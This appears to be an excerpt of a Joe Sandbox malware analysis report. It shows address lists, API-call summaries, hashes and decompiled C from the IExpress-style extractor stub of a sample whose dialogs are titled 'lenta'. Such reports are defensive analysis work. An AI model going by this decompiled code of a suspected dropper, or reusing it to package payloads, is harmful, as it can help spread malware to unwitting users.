                                                                                                                                                                                                                                            0x008d338f
                                                                                                                                                                                                                                            0x008d3394
                                                                                                                                                                                                                                            0x008d3396
                                                                                                                                                                                                                                            0x008d33a4
                                                                                                                                                                                                                                            0x008d33ab
                                                                                                                                                                                                                                            0x008d33b6
                                                                                                                                                                                                                                            0x008d33be
                                                                                                                                                                                                                                            0x008d33c3
                                                                                                                                                                                                                                            0x008d33c5
                                                                                                                                                                                                                                            0x008d3435
                                                                                                                                                                                                                                            0x008d3437
                                                                                                                                                                                                                                            0x008d3437
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3437
                                                                                                                                                                                                                                            0x008d33c7
                                                                                                                                                                                                                                            0x008d33c9
                                                                                                                                                                                                                                            0x008d33cc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d33cc
                                                                                                                                                                                                                                            0x008d33ad
                                                                                                                                                                                                                                            0x008d33b4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d33b4
                                                                                                                                                                                                                                            0x008d3398
                                                                                                                                                                                                                                            0x008d3399
                                                                                                                                                                                                                                            0x008d339b
                                                                                                                                                                                                                                            0x008d339c
                                                                                                                                                                                                                                            0x008d339d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d339d
                                                                                                                                                                                                                                            0x008d334c
                                                                                                                                                                                                                                            0x008d3351
                                                                                                                                                                                                                                            0x008d3354
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d335c
                                                                                                                                                                                                                                            0x008d3362
                                                                                                                                                                                                                                            0x008d3364
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3366
                                                                                                                                                                                                                                            0x008d3367
                                                                                                                                                                                                                                            0x008d3369
                                                                                                                                                                                                                                            0x008d336a
                                                                                                                                                                                                                                            0x008d336b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d336b
                                                                                                                                                                                                                                            0x008d331c
                                                                                                                                                                                                                                            0x008d3323
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3329
                                                                                                                                                                                                                                            0x008d332b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d332b
                                                                                                                                                                                                                                            0x008d324c
                                                                                                                                                                                                                                            0x008d324c
                                                                                                                                                                                                                                            0x008d324f
                                                                                                                                                                                                                                            0x008d32c8
                                                                                                                                                                                                                                            0x008d32ce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d32ce
                                                                                                                                                                                                                                            0x008d3251
                                                                                                                                                                                                                                            0x008d3256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3271
                                                                                                                                                                                                                                            0x008d3277
                                                                                                                                                                                                                                            0x008d3279
                                                                                                                                                                                                                                            0x008d3298
                                                                                                                                                                                                                                            0x008d329d
                                                                                                                                                                                                                                            0x008d329f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d32b0
                                                                                                                                                                                                                                            0x008d32b6
                                                                                                                                                                                                                                            0x008d32b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d32be
                                                                                                                                                                                                                                            0x008d3280
                                                                                                                                                                                                                                            0x008d3289
                                                                                                                                                                                                                                            0x008d328e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d328e
                                                                                                                                                                                                                                            0x008d327b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d327b
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000003E8,008D8598,00000200), ref: 008D3271
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 008D33E2
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 008D33F7
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 008D3410
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000836), ref: 008D3426
                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000), ref: 008D342D
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 008D343F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$lenta
                                                                                                                                                                                                                                            • API String ID: 2418873061-2614117474
                                                                                                                                                                                                                                            • Opcode ID: 5c4998908c98a0e13a553eecfecf5cfec8bebf061799d4ce77f9c88002bf3de5
                                                                                                                                                                                                                                            • Instruction ID: 11efc6095d68463d652781062c80976901b03b06958caa1791edac6f23c0755f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c4998908c98a0e13a553eecfecf5cfec8bebf061799d4ce77f9c88002bf3de5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84513B3038225177EB255B796C8CF7F3B59FB56B55F10432BF246D63C0CAA88A0192A7
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E008D2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				struct HRSRC__* _t31;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t13 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                            				_t65 = 0;
                                                                                                                                                                                                                                            				_t66 = __ecx;
                                                                                                                                                                                                                                            				_t48 = __edx;
                                                                                                                                                                                                                                            				 *0x8d9a3c = __ecx;
                                                                                                                                                                                                                                            				memset(0x8d9140, 0, 0x8fc);
                                                                                                                                                                                                                                            				memset(0x8d8a20, 0, 0x32c);
                                                                                                                                                                                                                                            				memset(0x8d88c0, 0, 0x104);
                                                                                                                                                                                                                                            				 *0x8d93ec = 1;
                                                                                                                                                                                                                                            				_t20 = E008D468F("TITLE", 0x8d9154, 0x7f);
                                                                                                                                                                                                                                            				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                            					_t64 = 0x4b1;
                                                                                                                                                                                                                                            					goto L32;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                            					 *0x8d858c = _t27;
                                                                                                                                                                                                                                            					SetEvent(_t27);
                                                                                                                                                                                                                                            					_t64 = 0x8d9a34;
                                                                                                                                                                                                                                            					if(E008D468F("EXTRACTOPT", 0x8d9a34, 4) != 0) {
                                                                                                                                                                                                                                            						if(( *0x8d9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                                            							 *0x8d9120 =  *0x8d9120 & _t65;
                                                                                                                                                                                                                                            							if(E008D5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                            								if( *0x8d8a3a == 0) {
                                                                                                                                                                                                                                            									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                            									if(_t31 != 0) {
                                                                                                                                                                                                                                            										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0x8d8184 != 0) {
                                                                                                                                                                                                                                            										__imp__#17();
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0x8d8a24 == 0) {
                                                                                                                                                                                                                                            										_t57 = _t65;
                                                                                                                                                                                                                                            										if(E008D36EE(_t65) == 0) {
                                                                                                                                                                                                                                            											goto L33;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t33 =  *0x8d9a40; // 0x3
                                                                                                                                                                                                                                            											_t48 = 1;
                                                                                                                                                                                                                                            											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                            												if(( *0x8d9a34 & 0x00000100) == 0 || ( *0x8d8a38 & 0x00000001) != 0 || E008D18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t64 = 0x7d6;
                                                                                                                                                                                                                                            													if(E008D6517(_t57, 0x7d6, _t34, E008D19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                            														goto L33;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												L30:
                                                                                                                                                                                                                                            												_t23 = _t48;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t23 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E008D2390(0x8d8a3a);
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t64 = 0x520;
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								E008D44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 =  &_v268;
                                                                                                                                                                                                                                            							if(E008D468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            								goto L3;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                            								 *0x8d8588 = _t43;
                                                                                                                                                                                                                                            								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(( *0x8d9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                            										_t64 = 0x524;
                                                                                                                                                                                                                                            										if(E008D44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                            											goto L12;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L11;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t64 = 0x54b;
                                                                                                                                                                                                                                            										E008D44B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                                                                                                                                                                                            										L11:
                                                                                                                                                                                                                                            										CloseHandle( *0x8d8588);
                                                                                                                                                                                                                                            										 *0x8d9124 = 0x800700b7;
                                                                                                                                                                                                                                            										goto L33;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t64 = 0x4b1;
                                                                                                                                                                                                                                            						E008D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						 *0x8d9124 = 0x80070714;
                                                                                                                                                                                                                                            						L33:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x008d2cb5
                                                                                                                                                                                                                                            0x008d2cbc
                                                                                                                                                                                                                                            0x008d2cc7
                                                                                                                                                                                                                                            0x008d2cc9
                                                                                                                                                                                                                                            0x008d2cd1
                                                                                                                                                                                                                                            0x008d2cd3
                                                                                                                                                                                                                                            0x008d2cd9
                                                                                                                                                                                                                                            0x008d2ce9
                                                                                                                                                                                                                                            0x008d2cf9
                                                                                                                                                                                                                                            0x008d2d0e
                                                                                                                                                                                                                                            0x008d2d15
                                                                                                                                                                                                                                            0x008d2d1c
                                                                                                                                                                                                                                            0x008d2ef3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2d2d
                                                                                                                                                                                                                                            0x008d2d34
                                                                                                                                                                                                                                            0x008d2d3b
                                                                                                                                                                                                                                            0x008d2d40
                                                                                                                                                                                                                                            0x008d2d48
                                                                                                                                                                                                                                            0x008d2d59
                                                                                                                                                                                                                                            0x008d2d84
                                                                                                                                                                                                                                            0x008d2e1f
                                                                                                                                                                                                                                            0x008d2e1f
                                                                                                                                                                                                                                            0x008d2e2e
                                                                                                                                                                                                                                            0x008d2e41
                                                                                                                                                                                                                                            0x008d2e5a
                                                                                                                                                                                                                                            0x008d2e62
                                                                                                                                                                                                                                            0x008d2e6c
                                                                                                                                                                                                                                            0x008d2e6c
                                                                                                                                                                                                                                            0x008d2e75
                                                                                                                                                                                                                                            0x008d2e77
                                                                                                                                                                                                                                            0x008d2e77
                                                                                                                                                                                                                                            0x008d2e84
                                                                                                                                                                                                                                            0x008d2e8b
                                                                                                                                                                                                                                            0x008d2e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2e96
                                                                                                                                                                                                                                            0x008d2e96
                                                                                                                                                                                                                                            0x008d2e9e
                                                                                                                                                                                                                                            0x008d2ea2
                                                                                                                                                                                                                                            0x008d2eba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2ece
                                                                                                                                                                                                                                            0x008d2ede
                                                                                                                                                                                                                                            0x008d2eed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2eed
                                                                                                                                                                                                                                            0x008d2eef
                                                                                                                                                                                                                                            0x008d2eef
                                                                                                                                                                                                                                            0x008d2eef
                                                                                                                                                                                                                                            0x008d2eef
                                                                                                                                                                                                                                            0x008d2ea2
                                                                                                                                                                                                                                            0x008d2e86
                                                                                                                                                                                                                                            0x008d2e88
                                                                                                                                                                                                                                            0x008d2e88
                                                                                                                                                                                                                                            0x008d2e43
                                                                                                                                                                                                                                            0x008d2e48
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2e48
                                                                                                                                                                                                                                            0x008d2e30
                                                                                                                                                                                                                                            0x008d2e30
                                                                                                                                                                                                                                            0x008d2ef8
                                                                                                                                                                                                                                            0x008d2f01
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2f01
                                                                                                                                                                                                                                            0x008d2d8a
                                                                                                                                                                                                                                            0x008d2d8f
                                                                                                                                                                                                                                            0x008d2da1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2da3
                                                                                                                                                                                                                                            0x008d2dae
                                                                                                                                                                                                                                            0x008d2db4
                                                                                                                                                                                                                                            0x008d2dbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2dca
                                                                                                                                                                                                                                            0x008d2dd3
                                                                                                                                                                                                                                            0x008d2df5
                                                                                                                                                                                                                                            0x008d2e02
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2dd5
                                                                                                                                                                                                                                            0x008d2dde
                                                                                                                                                                                                                                            0x008d2de3
                                                                                                                                                                                                                                            0x008d2e04
                                                                                                                                                                                                                                            0x008d2e0a
                                                                                                                                                                                                                                            0x008d2e10
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2e10
                                                                                                                                                                                                                                            0x008d2dd3
                                                                                                                                                                                                                                            0x008d2dbb
                                                                                                                                                                                                                                            0x008d2da1
                                                                                                                                                                                                                                            0x008d2d5b
                                                                                                                                                                                                                                            0x008d2d5b
                                                                                                                                                                                                                                            0x008d2d5d
                                                                                                                                                                                                                                            0x008d2d69
                                                                                                                                                                                                                                            0x008d2d6e
                                                                                                                                                                                                                                            0x008d2f06
                                                                                                                                                                                                                                            0x008d2f06
                                                                                                                                                                                                                                            0x008d2f06
                                                                                                                                                                                                                                            0x008d2d59
                                                                                                                                                                                                                                            0x008d2f18

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 008D2CD9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 008D2CE9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 008D2CF9
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46A0
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: SizeofResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46A9
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46C3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LoadResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46CC
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LockResource.KERNEL32(00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46D3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: memcpy_s.MSVCRT ref: 008D46E5
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46EF
                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D2D34
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 008D2D40
                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 008D2DAE
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 008D2DBD
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 008D2E0A
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                            • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                            • Opcode ID: baa3232d30ed279efe2c097a80eb5817db76848747bc735c0b1f5306043885ff
                                                                                                                                                                                                                                            • Instruction ID: 6b7b2a6e9f64d0070fc2772db50cc149d59a7bb154097b19a075b5439455c667
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: baa3232d30ed279efe2c097a80eb5817db76848747bc735c0b1f5306043885ff
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09510670341315ABEB24A7759D4AB3A37A9FB65710F104727F982D53D2EEB88C41C622
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                                                                                                            			E008D34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t35;
                                                                                                                                                                                                                                            				struct HWND__* _t38;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t9 == 0) {
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					 *0x8d91d8 = 1;
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					_push(_a4);
                                                                                                                                                                                                                                            					L21:
                                                                                                                                                                                                                                            					EndDialog();
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				_pop(1);
                                                                                                                                                                                                                                            				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                            				if(_t12 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                            					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L19;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t35 = _a4;
                                                                                                                                                                                                                                            					 *0x8d8584 = _t35;
                                                                                                                                                                                                                                            					E008D43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                            					__eflags =  *0x8d8184; // 0x1
                                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetWindowTextA(_t35, "lenta");
                                                                                                                                                                                                                                            					_t17 = CreateThread(0, 0, E008D4FE0, 0, 0, 0x8d8798);
                                                                                                                                                                                                                                            					 *0x8d879c = _t17;
                                                                                                                                                                                                                                            					__eflags = _t17;
                                                                                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						E008D44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t35);
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t23 = _t13 - 1;
                                                                                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 2;
                                                                                                                                                                                                                                            					if(_a12 != 2) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					ResetEvent( *0x8d858c);
                                                                                                                                                                                                                                            					_t38 =  *0x8d8584; // 0x0
                                                                                                                                                                                                                                            					_t25 = E008D44B9(_t38, 0x4b2, 0x8d1140, 0, 0x20, 4);
                                                                                                                                                                                                                                            					__eflags = _t25 - 6;
                                                                                                                                                                                                                                            					if(_t25 == 6) {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						 *0x8d91d8 = 1;
                                                                                                                                                                                                                                            						SetEvent( *0x8d858c);
                                                                                                                                                                                                                                            						_t39 =  *0x8d879c; // 0x0
                                                                                                                                                                                                                                            						E008D3680(_t39);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t25 - 1;
                                                                                                                                                                                                                                            					if(_t25 == 1) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetEvent( *0x8d858c);
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                            					TerminateThread( *0x8d879c, 0);
                                                                                                                                                                                                                                            					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x008d34fb
                                                                                                                                                                                                                                            0x008d34fe
                                                                                                                                                                                                                                            0x008d3665
                                                                                                                                                                                                                                            0x008d3666
                                                                                                                                                                                                                                            0x008d3666
                                                                                                                                                                                                                                            0x008d3668
                                                                                                                                                                                                                                            0x008d366e
                                                                                                                                                                                                                                            0x008d366e
                                                                                                                                                                                                                                            0x008d3671
                                                                                                                                                                                                                                            0x008d3671
                                                                                                                                                                                                                                            0x008d3677
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3677
                                                                                                                                                                                                                                            0x008d3504
                                                                                                                                                                                                                                            0x008d3506
                                                                                                                                                                                                                                            0x008d3507
                                                                                                                                                                                                                                            0x008d350c
                                                                                                                                                                                                                                            0x008d365b
                                                                                                                                                                                                                                            0x008d365f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3661
                                                                                                                                                                                                                                            0x008d3512
                                                                                                                                                                                                                                            0x008d3515
                                                                                                                                                                                                                                            0x008d35be
                                                                                                                                                                                                                                            0x008d35c1
                                                                                                                                                                                                                                            0x008d35d1
                                                                                                                                                                                                                                            0x008d35d8
                                                                                                                                                                                                                                            0x008d35de
                                                                                                                                                                                                                                            0x008d35f8
                                                                                                                                                                                                                                            0x008d3617
                                                                                                                                                                                                                                            0x008d3617
                                                                                                                                                                                                                                            0x008d3623
                                                                                                                                                                                                                                            0x008d3637
                                                                                                                                                                                                                                            0x008d363d
                                                                                                                                                                                                                                            0x008d3642
                                                                                                                                                                                                                                            0x008d3644
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3646
                                                                                                                                                                                                                                            0x008d3652
                                                                                                                                                                                                                                            0x008d3657
                                                                                                                                                                                                                                            0x008d3658
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3658
